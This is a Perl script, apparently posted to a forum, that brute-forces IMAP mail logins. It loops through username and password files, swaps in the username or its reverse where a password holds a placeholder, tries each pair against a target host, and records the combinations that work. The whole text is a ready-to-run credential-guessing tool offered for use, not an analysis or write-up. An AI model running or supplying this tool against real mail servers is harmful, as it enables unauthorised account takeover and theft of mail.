Код:
   #!/usr/bin/perl
#
#
# @2000M.eiszner mei@websec.org
# imap std-authentication brute forcer
#
# passfile accepts special vars:
# %%UID%% username
# %%UIDREV%% username-reverse
#
########################################

use strict;
use Getopt::Std;
use Net::IMAP::Simple;

## get options
##
use vars qw($opt_h $opt_u $opt_p $opt_l);
getopts("h:u:p:l:");

## vardecs
##
my $host = $opt_h;
my $userfile = $opt_u;
my $passfile = $opt_p;
my $logfile = $opt_l;

## check that
##
if (!$host || !$userfile || !$passfile)
{
print "\nusage: $0 -h [host]\n\t-u [userFile]\n\t-p [passfile]\n\t-l [logfile]\n\n";
exit 11;
}

## input validation
## whatfor :-)

## resultfile
if ($logfile ne '')
{
open (RF, "> $logfile") || die "cant open $logfile !?!\n";
print RF "$host:\n";
}

## userloop
open (UF, "< $userfile") || die "cant open $userfile !?!\n";

## open host session
my $imap = new Net::IMAP::Simple("$host");
die "\n$host no IMAP ?!\n" if (!$imap);

## beginn userloop
##
while(<UF>)
{
my $uid = $_;
$uid =~ s/[\n\r]//g;

## passloop
open (PF, "< $passfile") || die "cant open $passfile !?!\n";

while(<PF>)
{
my $pwd = $_;
$pwd =~ s/[\n\r]//g;

## check password for specialities
##
$pwd = &special($uid,$pwd);

if ($imap->login($uid, $pwd) eq "0")
{
print "$uid:$pwd *** WORKED ***\n";
print RF "$uid:$pwd *** WORKED ***\n" if ($logfile ne '');
$imap->quit();
$imap = new Net::IMAP::Simple("$host");
}
else
{
print "$uid:$pwd\n";
}
## done

} # endpassloop
close (PF);

} # enduserloop

close (UF);
close (RF) if ($logfile ne '');
$imap->quit();

### end main begin subs
###
### sub special (pwd,uid)
### returns pwd

sub special
{
my $u = shift;
my $p = shift;

## check for %%UID%% in password
##
$p =~ s/%%UID%%/$u/ if($p =~ /%%UID%%/);

## check for %%UIDREV%% in password
##
if ($p =~ /%%UIDREV%%/)
{
my $tmp = "";
my $c = 0;

for ($c=length($u);$c>=0;$c--)
{
$tmp .= substr($u,$c,1);
}
$p =~ s/%%UIDREV%%/$tmp/;
}

## done
##
return $p;
}